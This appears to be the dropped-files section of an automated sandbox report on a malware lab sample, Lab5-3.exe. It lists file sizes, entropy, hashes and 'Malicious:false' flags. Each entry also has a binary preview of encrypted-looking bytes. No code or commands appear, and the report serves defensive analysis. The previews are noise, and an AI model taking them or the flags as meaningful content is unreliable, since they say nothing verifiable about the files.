                                                                                                          SSDEEP:48:dHDuCPATMjR79O8BRHCsNrxUDk8MklPvKI4Msk7VHfUTid3hBaUoSGFcmeykEdEb:hPATMftBRJ1bnkl6vMsquGx0uKeY2Elk
                                                                                                          MD5:E8C8AB070F9236FB69C87A8624A3722C
                                                                                                          SHA1:3BCDD18CB5EF4ED89FAC650EAD49B6D222CE2A15
                                                                                                          SHA-256:CB5F50C6DE394282FAA1D7B0CFE47EA3BFA3F58CAA26A44D7EE93C7E4F22945E
                                                                                                          SHA-512:C73DF2D10EDE3E8676734EC1FAB7EB0D900341CED52377C07A6FF9C9F1D959D2BC895545FDB86B8084D52ADCB40942D370365D0167B2A12E2DC7AFB9E49CAA28
                                                                                                          Malicious:false
                                                                                                          Preview:b...W.....Y....V....bF...;..&S/.L..W...~0i..f...+..$.K&...c._.`......3.F.D........\."...B...T]..*Kif...zn..K..H7..8...$.d.....^.c...d.>b5BO.].#..2..[...c.>n%_|...c..G8.{.V..4..V.......Av.J..^..WB(.4eeZ,....z.z.Z..r.).';....E...).l{.....5...$.p.....l......!-.3uo..{.V....&..Tp..'..?Z9..J|\.ZNr..z..\.1.|.wA.,..}.........0.?..W.....|.........$..^...i.....).XcR....du..B....p.A.......9Vw...R.{`.$.........&T.J...6...A~.L;..<v"..3W.......T...-,R...>.:...\....`.X.@......<...`U`. .<....e..s...........\)o...Z..Z...7..l6...;..Mv......U.@./..|....D.4....:<4.M..a.=.....>D..C.v . .b.~...<........BJ.VQ...$..../2.Oi.\..\..........Q(...hM:...M..%)"...@.....p....u6....[@.o.<.yLO..~.A.k..]Hh.&......7....?.g....R....h.*k)C..*v/..Z..............n{....N.;.u...Y=.8.9E..JI..%kOx.iF...9..,.5x.u..bY)qk.t...?....?x_.h2..`.>q...`._.!...Z..n..<.....L...6.Z.....(.q.^nG..\L.Z..-. .............@....L.n.c.....<...a_.E..o.w.`..NR~ ThK)5....YL..N.........|......[.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2896
                                                                                                          Entropy (8bit):7.942457306729259
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tLrEWV1xD793SRC8eOWGHfUTid3hBaUoSGFcmeykEdEElU92i:tLrE8x/dGC82Gx0uKeY2ElUJ
                                                                                                          MD5:79DED6B4CFB3478C08979BA88E7C9CBD
                                                                                                          SHA1:328216FC7FBEE001F2321B9A4FA1C872C9C7E243
                                                                                                          SHA-256:EEAB041DCC5DB8E550ACDEF331693434BB7EF7E2AEBF5592D4CCD716086967E0
                                                                                                          SHA-512:0B4E15C005D24317CD5AAC332839A5A3CE34126022D3E6535B5919F83036BC5CBA675B8DAAD54AE28267F7C4653F12E1D8680011C3E50C8687F13CCF8C2189EB
                                                                                                          Malicious:false
                                                                                                          Preview:..ss:\U...Cd...,..,4.f`%|~.e.h.X.{.[:hA0...fD...E)V....K.....+...V.....>.)S=Ug....sy<.....E!..I...C.....HZ.FE..,j..'.{......uT{.|Mf.`..M.W....*.....4..1.;I.fh..c......;.)..zT5........w7!.Y2V@>.Qj.....:.....8.,.G..|y...-.p..H.%+VHk!.}.bO&.&..Iv...@..ds...0(xH../..|....q{2.. e4......t%.Mmosx.C......G..B.=....U.).nc....$.M...zY.+). p.....8!h...4...Gcls..F.X.zAm.P.!..Z{./......d;..Q....W.L.r[..../M.....E..ZK.8.J..X..wq,['df.|#39.Q......|...yDF-.j. .......,..Y.<.E..dk\.;...u.._kn.(e.....tPu...H....D.B...P.Y.05.Bn:..P!a.kP|0..U.....}..../$.8..-.."F.v<l....,..:..@.......P.................Igw.D9..+y..(...H..4\..$.R<55.k~..w...@>QW.....i..wu..:./P..k/.. ..#.K.Z.n..o..%...EK..dv....g......M.hN!..fR.5.{$...WS..3.......Z......".A..<.m........E....{{......5z....../!KBC^.!...y.HX..4...?.r..=t...a..M..</...Y....Y4...).@~..S.b....I.x ..V..:ia.z.^ ..o<3.....>Xm./.....U...G..k....c,......_z94.......i?.{.q.J.7@Q\.."bR6..F...M?]WfS IW............IB.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2848
                                                                                                          Entropy (8bit):7.940182514189568
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:V1lTZZQzZXjLbpMq+FHu0mGF0DbrXqEHfUTid3hBaUoSGFcmeykEdEElU92i:Vn0VbLrvDbjqDGx0uKeY2ElUJ
                                                                                                          MD5:4240A8F87CAFF0CDA5105E8A07C3551C
                                                                                                          SHA1:868BB99FBE61F6C3D68C55E407F12C9E29CED5BA
                                                                                                          SHA-256:2E3AAB589CA6D2B0C9ED10812AAF83E5E75D5BDFC4CD483CEADF037A0D730C0F
                                                                                                          SHA-512:FA753AB26DF95D82E5D81046AE2E58E491550D10053D09EBDE3F44991AF7D521EE0F5230668FC7681D91C3F2027EC9EAFBDB42CF995158706434CF1BC368AE92
                                                                                                          Malicious:false
                                                                                                          Preview:.......WB..+Sih.+z1..@..`n.!..f.....N...s......Uv....z.......1.k..<%.u.....~W..~.R...`.H..".............8..5yZ..wu3kw..'.O.+...NcB6.....~......`.<q`h.~...$...L..UBS~\-..&..&.@q..V.....]..........C.....gs....F...%.....^....}...].~k...l8.k(m!..7.......T.m0^VZ.._._.'.:...;..M.sz...!..H.I.f.....)}$..:,6.[x....;s.E..V5...qf1!.gv.L&.=.T]....yc..dQ%..v&..H.?..o..2.v....O.0...mP.:.2+..........:.S.$.4*..|......bt4..-.P...!ds _S.E..6...e.Gz.z`*....~...tP.j{s....'.8...>..8...].IYF6.:4....!7QJN.O.R.z...,..[....p.Y..}x...B....'..$..Z%.a..:.....6.>.x.U.Q.M...>.5...SZ.we.w.)nh.W.8*...o...Dk.<.yv"7.{|.k.#.Y.C.P.c\..c..;.N.x]...X..?.[.[.Z+I.......2\p.-.....>......\]1...-.........d..8A..Z.y&*...@.oU:....fu.:/..V...o.. Q.#.f....T.S"..Lv(....NT.Et>.[...P..Ucl...~.o....E.....:...E.....y......2...#...J..{..o......*.`.e-\..4....T..e..........#3l....u..0U.3cR..E........p...5TK.]..".j..stO........'.&..3t.&.~..7....r...i..Cs.+...;x.[...%...r=...{...J...RO...SE[.../.W...4
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2864
                                                                                                          Entropy (8bit):7.9427232156472405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DUMfYPCyQdfjwpSmSwpTHZHfUTid3hBaUoSGFcmeykEdEElU92i:DUMwudpmSw16Gx0uKeY2ElUJ
                                                                                                          MD5:41EC3E1E7BCC5533680F08A3D806E7FE
                                                                                                          SHA1:30D9DBC0176D75E1FB3C64D2B2D6691925EEB8BF
                                                                                                          SHA-256:654900856B1FACFCF120D914C4703AB7BD25821F93BE1B45F8D765833BFB1F6B
                                                                                                          SHA-512:3CC1C00896EFDC15C4A4B0698223946B79314FC929F71DA008B0680391E36E6945ADD0CB6EFE7155DED0A7DAF3C19E756FAC60D7F0E2DAB109E9F735A4E9579B
                                                                                                          Malicious:false
                                                                                                          Preview:]. . lA.7..B.y...<.g....e.m$3d........R.[y.`..$...8.1y@\.k...H...j^.....J.<....|g<.TX.u.n#t.....Ea.^CS{. i5Gl.1..S.35.j...o....~..M;W.8.Zl.......z.X..i......Z&u..r..4...!&.....=m;.A....z.G..#xX...|....'.y.....f.:..7V.......<M.........KP./....Z.d0..B...r.G..1z_#.-......C.`#o.<...8..?.....{..@M..H.Bu>e/..j...w...;e...\ga..^........D.........$...-.D.c..[..'W..Z...........'.r\....v$.....Lb.._..=....fD.m`P...Q..^i.kP.H.4.^........[*...e .Sm..dl+}{1S.G..........V3.,ir..V..-.h......#..k...r!..s.#A.Q..........!......8R.v.......].S.:.(..O...8EU....L.h..'.G.*../.-e.....K6..D%>D)8.....^.<x.C.....'SK&y)....."..........M.)U...vL.)O....|;J....d.wV\..y.....u...._.1..5....9..2.s......Z)...s..F.>.$t:.R/..7..EE.Lf<..$.2..{...".1.......c...H....*..H...W.\.@..$.e.m.,..}...**...n...a..1]s..h4:?....L.R.s.G..fS.%..47....Iz"E.Y..r5!.."...tTGk{.......E....j;.j3U........4.K....k.-G..../.].5....4..V..9Z...h`>...w...?].F....i..\..u.s.J.....|.(.%...#nP..S.o....._...X.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2864
                                                                                                          Entropy (8bit):7.936642225907067
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:rXCh2k3tWywZdh/VY0xwXlRdged2SzulY4HfUTid3hBaUoSGFcmeykEdEElU92i:ehRtWy2siwXnqpefGx0uKeY2ElUJ
                                                                                                          MD5:36D274EC1C486AF6147690E5D73819B8
                                                                                                          SHA1:00AB3ADCF94B885D7D2952EFC707B4C39358E586
                                                                                                          SHA-256:98B87EAC1995F5A6F977D47F0F3B58A59BE9CF7A5ECF89D546CDA1C466562D7A
                                                                                                          SHA-512:445846EB9115F1206A0D53A13B5C734D881F87265263B2BEF9E77DBECF08FD76C8BCC64999F234BE9A01A758BD4642B74430C0509795A792E4F41E1CE9714A97
                                                                                                          Malicious:false
                                                                                                          Preview:...d........Z..M./.kg...o'.93...aY......./@...h.&...^.$..E.X........D.\bZ.% ..F$.9...6v./v...)..#C..U..7.6..1..F.I.h....6u..P...k...~.8....v...:....$7..a.1.......N4...^...".~^.|L..y..A.m{.x@...=.....p.?.U.....tv.D!..w...e`n.$:.g...!:Q...k'..`tw/o.U}..../|....$A....>4Fs>...(..gO.o.M...F.N.....d.x.zHz._&..y.i..N3...N.;1..n...).1..60wO........I\Y.E.l.i.<$..L.".....M..A.T.XK{..< .4.....l...I...7..GF..(.#.Q|L=.7...UB.....SJ....nl..tN...cK.f..f:..v....L..2Cp.BQ...U........?.V.....m..xoy..1DX..7..2..6....X"..q..o...J..+P..z.....,..*... #T)..8*O....W.n.....b^.>.N...{.?...E..GAH.._.C.U1.P...<J^.<...n*.\W..YAT.....v...m..............P..L....e....f0..x.#...8..1.J.Mv..{.;<.b..D.i.Z....L..o....fz...T7<1w9...d....=..5....=6....q..........+p.{..96g..<.n*..Dz'.....L|.c5..l...... .y.}......cvC...vEt.,........l.3...}..s...q.]%oU.Aob.....n..Q;...!.O.3....U.Z..x,kx.M..3j...P...?..M.PM...\T.y..9.6.Y.\..A(..]BqRn..m.T..v!....I.a/h................^#(.....5
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.927423248337796
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KXYadzOVn1T0fgtqK0tu3qjxCanbmpHfUTid3hBaUoSGFcmeykEdEElU92i:Ko5Vnvtuu3qjMLqGx0uKeY2ElUJ
                                                                                                          MD5:9A6D8A4CE94138B741363CD207092FC6
                                                                                                          SHA1:949A1F9B47883C38DF728ABB1A51BEF7738E4D16
                                                                                                          SHA-256:F437240DDD6D3FFD3F7EAF507441930A3550BC12FA16607B728E658B9C7A5975
                                                                                                          SHA-512:C4282C639E17667FECC7E5D00DCA2322225E123CEE0560DC9551A6F1F2B68394818001F33DC653DE0266A95CBB633E8B921252E06E16F4C16E60F88A7E4CE64C
                                                                                                          Malicious:false
                                                                                                          Preview:|.vnH....p...7.[.V.-.$.?.~.....0."H...K..@=Q....B.k...CI.w ..h~....!.[#.RA..+....{#V...8H........R+..v.........#.@:2~.~.E.Y....8.8.F...RN.|...y.B..5.....x.......Jv..>|.......E...-....<....N......0..3.0.-hB...m...U.f.....G;c..F...M.uC..@".g.Mud...z..;..n.b..(.k-.|z..*...L....~....u...b-..3.!I.....I.k..l<......U.........%`B..V.(.4.o..\.-.y.g.X.GxHH..P.3.|.....a.GK...!EG/.F..v.XL[.`z-.j.ec....NE.\#.G=.=K>..inZ......I...s...W:?!.......O....Mj........U.....d.. ;._.....<A..B%.K.?....?..0..|.;B.....E-H; ...._.Gc^..k..q..a...9..?9.,......A.X..M..n....9.h.a..Ge...?F.u..?..&......~d|x....r.k........iD........{..;.L.2.u.ms....d.'P.A.OV.._......$..wAp.v....V<he.T..h..~L...@^.T.Dq....`..{ ...(S.,&.....znm..$.CA).....;.q....D.u..S.C.V........Y..!..1\...7..Ag..O8J......ja..MRfA....4f).f.KR...9....;.f`,,..oi....S...48.......a...2.c.U..LC.-.S...&G..k.T`..>.....4P.........4!.Y.....n.....T....7~.....;7........I.-n....k.z...I=Z.`....Bk...I....I.E......].....k
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2848
                                                                                                          Entropy (8bit):7.933735017582334
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lEpXPVvxrKiw0SEc+GV4ORelQHhRCol2gmAtzHfUTid3hBaUoSGFcmeykEdEElUJ:ipXtZG0SP+GV4ORelQuol2g1AGx0uKeR
                                                                                                          MD5:1CC585057ABA6F12D635E7CA7B78DD34
                                                                                                          SHA1:6BBD3E3E6412805C9BA0DA638696A5D2DB67FEBD
                                                                                                          SHA-256:7BB447DD2EFC3CBFE2A9D29775932653C6EBE47540860669333C6FD43FC0E9CB
                                                                                                          SHA-512:74594777F7B7F693C9F5C04DE3982B0CF9AFDD8783EDD126AD3E5C84CB3DB92D3517C4D2F649FD9F2D3BDC90F08AF730728DB2F4B2AD10E84DEE8826CD2EFC20
                                                                                                          Malicious:false
                                                                                                          Preview:.mK.]a..@K'...U.;.<...\l.n..u*2/.....>p.....Z.+.enj...)u.....Cl..[.4.G}.......F^&.+.9..L........P...~.{.a...|...H..Q....waF_,.."..nE5..'}.5.D....v."...d..KI0......t.2nyQa4.bj..<..g!......w.'..[.....(....5.."..!..6..G.U.....}.a.:j.G}..V...+...+IO.7..W2.?....9.......N./.W2.'.].xWn........of...3..[.............w..a.....m.;a..r..Z...E-..L.X.......q.....6..w%.eK.bK...u.}d.@..a..F.. .h?...1W.T..{..).I.q.1.o.....g.r{5,....H..hz.+"_9-h.h:.e.Yt.......m}F.k&x.7.`......." t,..2hC....%.O[.4J....#.i....~0....\.e....t.........2.Q...h...-.d.........c.d...>.._..........._...1..Q.+..2...6 .2?.,.0N.s..J}.4{..+..r....;..#!?...M......%P.J-..1....u......XlJB5..,.5o,.d.t!!...YZLn.m..8Kt.5...B.!n.90v.r.nW...)M@zr~..W.n... ..J.[..?=...Q0t.X.y.a!...E..t..?<:C.2g.~.b8.r..(}........H...74.a!Q ...hs..A.."Iu;.....(Jv......./..g....H..4oV..(E...e...FZ..4D8.b`...i5.W>Y.?N..3..v.M....*v..L$d......{+.:.j....C.b......h...I+...f.I..,...jm.......G/j..D...H..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2864
                                                                                                          Entropy (8bit):7.9363354227368506
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5qn+sxQ0+jVJwmcQN4eKaUVHcHwOmrPHfUTid3hBaUoSGFcmeykEdEElU92i:kUjVJmK49aUVDOUUGx0uKeY2ElUJ
                                                                                                          MD5:097439E5BAB077B72A6757E681CB513B
                                                                                                          SHA1:60ECA44AB253F2AFD7ABF4D4A6C4F1C73CABCB1E
                                                                                                          SHA-256:1FDE6B5E0550B52CCA4A5672F4225F35F56AFDCE8A6DB593F67058FE40308784
                                                                                                          SHA-512:6EFF7C8DBE2D71011D7AC19F2AE2B88F82D8BA8E204EC661739BCECB3F0A5C8956E1B0A648787FB0D5494069D268D72909F4DDCE088AF8DBCBD473256F88513C
                                                                                                          Malicious:false
                                                                                                          Preview:.X$v....d..1_)..J........J:!zOeV.c...X....%-.t6..Lc&.B..1.y....3...w...G.w9.Z....D..`..m#....&I..d..)...L.r....v................0.<.I....A~....h..+.L.%.$`d.O.x.3..{TJ....y..x...T../.w.y..%.'..{....%.....R.AhO......Q+.:.F@.:.,.\.#<.{..].....8.b...sej}...,,.....VD.....^..m.GB..I;..c..V..z.......tj.;...1.z.O....n55.. ......H.G....4?....z6..tq.....CG.G..y...yR..D.Z]...]...R...Z..!.K.g..f....q.N:.0.7dk..5.O3.(..!...s....%.'...1..S...fM...Os..L..N.1.."...<.. ..V....*..8[.ZQm..wb.i>....?.$0.......R.t...}^.%.G.....r.7.I|.F.m.i.8.O...%..../|.....A.>..{...... .*V..V...~?.oT.N...~....%5._q......EB.>D....8.7.=..I...@.E.byK*..G.Q.g.-9j(...j'..v(.).&.j]7....gSs.HF7.1....>....P.......;.Y....a....<......T.+P.;u..-$.......{]..../|>....}.e....c..f....v_..>....H.{~...7.^|w.......(.*o?A}.....9..M.R......9..........R..G...h....41.x...p[4'.C._..u..5.G'..K........f..3...~2SF}.y.c.#......6...F.z,.~.k2.@$..>.....'F.x.(. 2.k_-P...l?...<...rQ ..c..Z.l...G..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.93770152855815
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:VJoStbpGoH+ibj4Day4TxIqCtIcrSzqtpckmtCGadHfUTid3hBaUoSGFcmeykEdM:EiGibkDdsYIfq4k619Gx0uKeY2ElUJ
                                                                                                          MD5:ED7A7FB1D6B289E3285FCDE3F1EDF877
                                                                                                          SHA1:04EAAD7EF87DEB5427286B288037CF93AB7372DA
                                                                                                          SHA-256:5AA4C23FECE3A0D3F012FD4E29AA8B11E02568BBD9BF9CA7673AEB8E32EB78AB
                                                                                                          SHA-512:D72E3FC8C15843E950F22B704691DE06052AA1B78C09B2D51F0123EB59BA4A687C966D44740FDA50AF561B92266E7B5929B11C97E73AE071484153409371FE5E
                                                                                                          Malicious:false
                                                                                                          Preview:O..t...N.._...,0*.bVZ...kM......7<:.+].v........j.r{..c7.3...Fz.=...Gs.,V..)2.?'..H...).]+..M......m....V.:~K.........k.*$...R..7.2...PY.&.....czN..N..Q&1....yH...A....FR..C[*_.......u..%H.5.....^......M...ZxPy4.HN...'.6........=z...h..Jsq_ r].[s.T../.....e."E....[*H#...9.^.~L.3.."...~..&.n....u.Vlm..a....Q..+....`...&.7.h.zA,\;Z#^...1*.+xE3...=ck.D..E.|\.&.2;.C..f.$q.T.X.....uA....S.Z.&!...-........dH2j...}:v.p.!.jf6..D..QU.K.Y/..u.x.k.5...........-.{.{.+..OL.PW&.HJC]....N....=.9...^.^kp..m[.....I..HB9...| .@....c(.is..o...z..;..Q...O",+...=`X..'...y.^.)-f.M.xO.sB....sX..So>...a..c2r..N.O....\w.d......go.......X..v>...Z.1.f.3....!r4a0M7....>.f.3S(..........M...E4.E.-._....N.....D.......,..9.;.....(xq......./....=NM...)..0k\M;P...:...(.N..V.1.!..SZ.....i.:...@2...;..?.....6.........9a......."gR......J....`..=E...{.C....5of.....e...;......yn.2.V"B..:n...m.3e-. .5..\Uo:./.6oj..3L,.].-.N.Q.D.4x..u.'...]..C....$.#N.U...RN.T.....\.c.....O.\...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2848
                                                                                                          Entropy (8bit):7.941773907609954
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:J6dp5ZsrJBRt5oY+hMoyBKuZ/CXPUzygHfUTid3hBaUoSGFcmeykEdEElU92i:J6JZsrZrDxBKq6fUzQGx0uKeY2ElUJ
                                                                                                          MD5:359543B7DD5FDA990888BDB85CCEBD52
                                                                                                          SHA1:E8AEA8F9336E092ADF6134EB590CB8BFA027D05E
                                                                                                          SHA-256:75555988FBA54A73111B563E4E2CAEB55078EE079EC4D18C7B3753D5E6F694BE
                                                                                                          SHA-512:F6EED77406D3D6DA45848297092067B947AF0B190109DFD4B0C7C4F32890030867EEE5B43A011EAB0741F8DE995DF5771475D4A07E7D59E9F2BEEDBA910C2CB6
                                                                                                          Malicious:false
                                                                                                          Preview:.K7.q..G.......&.z......7.o.2(......r."'.G....n...,..@]...O.J~.._.._.'....p%..o.pl.].....9[\.r..;^'9..Fz..:..c...~...........I|0"..A.tT.......L.U@..g.4...bV.............0}.P.m{V..,._..3.n......O..<uM.uTs>.X...9....e[d.....F...l........&/....M.....i.{......l.5.....Qb....w...e..o...Ol...{...0...\+.a.v...`I.......9.?......%.6...Tb....%^a..`..-^.c..KA.C.....3~.+.E[.4.....&x.tsEBnZ.#\..x..<.p.u......E.P..vbw..-..Lk.5a$..1..yL.....N5r...p.Bq....X.n........4.:4.|.i.'(.9.....|.v8._..M.,.....?.6....:..v]".\..3.......k...._.Uw2....A.ff...s7.:J.HIm..gj..Y....%.I.0x..i.E.S&.G.....7.)..bL.y.)s..(9r...Rh.!..B1..0;......v8P2^.u.?.N.(...y>../...kh..me.-.U.q...\.....:.Z........ e%1;.2.....C<.qWM.T#..c.^\.].@W2..P..[.\v$..z&.+.........~.....Tm....b...dMC.o..VR8F@.9r.u....;..J........k?4...]...y...L"..'...d...U..u.1.(.t....Nm....K..9j....U..5U..O.w.%...|.+dc@.3. .u..w...;g.,9...P..w'.8.Fh.2W...C....ZH..#..0]......A_}.....MQ.S....{.0.u..G.?.#.psV....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2800
                                                                                                          Entropy (8bit):7.936318313163991
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5cEBc5M9xfJ5JwHLLc2wf++2qSdI8ySOrHfUTid3hBaUoSGFcmeykEdEElU92i:5cX4J5n2whZ+rGx0uKeY2ElUJ
                                                                                                          MD5:4D68C7B3428791C9E1E28B8131989C9A
                                                                                                          SHA1:223F8E3F7E6C327980B3149D62C0B66FE9CB2E68
                                                                                                          SHA-256:76E4748237AEC78DB1669AA64D0755813B838B49D77468D538326EBCCC698CF4
                                                                                                          SHA-512:00210A7C7F12C6D7B6F7E9592AF3C7EED8E490B24926863973D15BD69535E54229B84E25B227A7D82B837B6138372B0A4BA5A07D738313241F20F50FC108AD37
                                                                                                          Malicious:false
                                                                                                          Preview:$..t....<.../.-... ..#....v.:K....._+. @.9..?'A.w.p.W..p..l.!....2.;.Ep+....-.M......{..CU...zRh.(.t.{.Ik.:.I.UC.v~...F..p.............2".3.....B$!j."...........R.$ .S..`.......?..!.$....55....O)Q....o.kc!.....B..k.t..#.B.b.......4k.......1...%g..._kW.....k!...aQ.;w.(..PD.....e.^'.X...X..p,..M|vb.}..?.&.......E.W.N.....@.'...wJ`.%...........CQ.m..v..i....T...+9I..c...nT6`!..gC..6C.3,P...?G2a7g....F.tEZ....i5..F.>.J..uc...:..........&.v.X..-.....W.@<........{'11.%Yz.y..G........h7.....3M}.?..7.4..`..[.p......X.D.]..4.uU\r...<.3..:..F'4Q. .z.-.....Fs'....;.-j>.c\.Y.b.vy..I..u5O.a..$@AZ.@^Q|g(w...g..<...4..i.......x4...MHD..H\.a.....E.........c)..Y....".Z,..TI....K.t~.'H.rJ...z..;.....S....B..D.e._.:Q.].]4.....t..{.K... /[..v.st...k."....0Z:..9|p....jg..]:..G..J.8o..G>......8^8......z.A...Q..u]......X..7......Hh....J......A.d.. ?.7[......84@5..OqD...H..Y"...1w`.f.g9t.`.a.Zc....u.6..B?]..7!.&.-I.c...A.......u...R....h..;~...t.......]
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2992
                                                                                                          Entropy (8bit):7.937076499301425
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:UVro0FKRbNVjR0e6yLOQ3pG59pALKjWQhiGHfUTid3hBaUoSGFcmeykEdEElU92i:UARlb6xopGPmGjWvGx0uKeY2ElUJ
                                                                                                          MD5:63B5C8CC03026C3AA43B0F0E367658C7
                                                                                                          SHA1:243A01BAE50AC755CC30538354F91E9808A440CB
                                                                                                          SHA-256:EF3D905DFCC5BA86F3449336E5E832A2E721CB49653FDF74DD5D38A9AFB7E81E
                                                                                                          SHA-512:467B9693C4AD832E55714DAB0C2C1CB89301F140D7053FA4AD3C53A104C51DCFF6143F49623F5E0F4F4508FA5766AA77AAA4E979B10C486C592D1877143F7B31
                                                                                                          Malicious:false
                                                                                                          Preview:..U.m....;.He.5l... VY.i2..Y-...2F.u8.L...7...9........b.Bg.8...u...>.LZ....`-n.A.[.....Z../3..)l3.E..;+.kw...2$...;_...<...t*..V.i......7.\.....%.[........T...#......=..w:O}.........+w..F..-...V...u.#......We.+....DNK....r..\...C.A.z.".....=..3...<..8.Y..9.........D...7.(#...61WL.#[O.....A...~._...a...g...K..6X..0c.3.0.9....}B:.....;k.'............{-&...M,..(..-.X.B-..R...b.).3.p.,...?...d....$...y..Z/.G...+......Qm.ee....j..t..[YW.^u.Z..[.f..~....].6....t...O.4.CW.c?.b......^.r*w`h.:$.*........K?..=t6..../...".N0.....6..j..D..:t....C`.T..QR.=`...%wZ.....G.e...c.v..O......."..z...ci=....s.%....h.... .....F.83.J.z]}9]Q..i.]"..7.D.'.!...)WX..K'V0..P...[...X@0....0......T[..1.....Jz..I.8q..}9...r._.8.I...a.3.X..IP....K2.S.>7/Y..+i.s.X.^3bK".x!%.dqJ^7.tO...N.3O.!X.g.a.%@...'....1D..4D*.......A.....Bs.UY>. n.>......*..lT.[?.....l..K..6..B)@H@...3O.;1\.... /..g.w|}.{z-Z........_\B.)T./..............~4~<{.....P...M.#.Y ..TY.m.RI.....P3c....;
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2864
                                                                                                          Entropy (8bit):7.934962997776572
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:aV7HzPwdtf1FFBoAIU1szsxMKHfUTid3hBaUoSGFcmeykEdEElU92i:a1Hzodx1FFSA7BOGx0uKeY2ElUJ
                                                                                                          MD5:57421A5923B50B49D9C15524E6C858AA
                                                                                                          SHA1:99BBABCC93AD51305F0D6EB6892C11496645F0A7
                                                                                                          SHA-256:9CDBD75EF4841F9E0DB311BFB146E44A9A9F4F47184FD940BD2E15E0AC12EE37
                                                                                                          SHA-512:4AB9FC1D5214ECE5DD93B621A70340878A64F266F16EA95C16283BB2E5578A3D8A6443F2720D1D05FD1D9A8C71C75DBB967DF0056D108DB74239E6A9C1ABA0E6
                                                                                                          Malicious:false
                                                                                                          Preview:.,b.H.8.YDa..Dq.(Z}b..Q+.?(.Y..==.0....;.9..w#M..........#O..~.xn.4E?.qXrW....<....56...Z..U..Z.2...#.k.....cV^F!......[..v.j.........d..}.cIbA.>T'...=.VG.)..1.4.J.+9....rB......>.F;T.~..."...+7kn.k2.\.%.u.*...x.T.P...Zn..............UH...</SD.8.[..m)..[.;....^IS...?...}...@2..3.W\4..C.lt.....3..&.,..OJ...]...L+.`?.xY.O..l....C.....p.......'.......@G'f.....s@..F.?=A.....Sr.t.....;.J....}Q.=..!...q..d.C.]?..1..S\G....S1.]t5`....;.`...ZJz[f......|I..v...<...Cg ...(.\....6k.4..>.c....BF...p..<.o...|....W..)U<Mi...kdj.Y...TXb..a.....3.....[.;.%w.=.Df.&..smr..y......oM_..GZx5r7de)(c.Y.2~.r..:...........!`|..T1.<.4.......%I..]....'.^.i..F..[Q........DDVT.j6b....kURBu....RN.,.=..`....S.=.....]!.4y8..-#+..m..u\P.A.M....lv.e2./...P..h.8...&..E.R...a.,.g....Q.%l..t.>1.F.......j~.....f.}9..#.-......s..}........D.cV........#mp.F8..I...... ..!-.OTR......N.3......1.-v.....#k.......n.++y....v.....~..a..W....%mM..T.[.W ...X}.}.&A.EZ1..C7.l..!..I}..Q.(#J...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
